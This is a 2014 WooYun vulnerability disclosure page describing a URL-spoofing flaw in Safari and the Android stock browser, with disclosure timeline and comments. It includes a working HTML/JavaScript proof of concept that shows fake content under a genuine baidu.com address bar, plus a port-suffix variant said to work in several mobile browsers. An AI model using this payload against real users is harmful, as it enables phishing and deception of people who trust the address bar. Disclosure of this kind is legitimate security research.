当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078434

漏洞标题:safari/安卓浏览器 全版本URL欺骗漏洞

相关厂商:CNCERT

漏洞作者: mramydnei

提交时间:2014-10-06 09:24

修复时间:2015-01-04 09:26

公开时间:2015-01-04 09:26

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-14: 细节向第三方安全合作伙伴开放
2014-12-05: 细节向核心白帽子及相关领域专家公开
2014-12-15: 细节向普通白帽子公开
2014-12-25: 细节向实习白帽子公开
2015-01-04: 细节向公众公开

简要描述:

RT

详细说明:

问题存在于安卓标准浏览器全版本和safari(桌面/移动)浏览器全版本。
POC:http://kcal.pw/t5.htm

<html>
<title>https://baidu.com</title>
<script>
  setTimeout("document.write('<html><style>body{background-color:black;font-family: sherif;color:white;font-size:100px}</style>Fake baidu.com</html>');",1600);
setTimeout("location='https://baidu.com'",1600);
</script>
</html>


从欺骗的层面上来讲,https会比http更完美一些。因为有些浏览器会自作聪明的隐藏protocol。(参考第一张和第三张截图)
但对于长URL来讲,由于地址栏能显示的地址有限,所以在url后面加上port进行欺骗应该也有自己的优势吧。

漏洞证明:

safari桌面浏览器7.1:

1.png


安卓标准浏览器4.4:

2.png


safari for iphone 8.0.2:

IMG_1289.PNG


对于其它一些国产手机浏览器,可以将:

setTimeout("location='https://baidu.com'",1600);


改成:

setTimeout("location='http://baidu.com:1234'",1600);


进行排查。差不多都有问题。(猎豹,UC,海豚,百度,QQ,搜狗,遨游等)

修复方案:

暂无。

版权声明:转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-10-11 16:05

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-10-06 09:36 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    这么牛,你应该去苹果公司提交啊。就在深圳ccav看这里

  2. 2014-10-06 10:32 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    爱慕锅千秋万袋,一桶浆糊!

  3. 2014-10-06 13:24 | /fd ( 路人 | Rank:8 漏洞数:1 )

    爱慕锅千秋万袋,一桶浆糊!

  4. 2014-10-06 14:42 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    爱慕锅千秋万袋,一桶浆糊!

  5. 2014-11-17 19:28 | Sogili ( 普通白帽子 | Rank:129 漏洞数:27 )

    这个Vector影响确实很多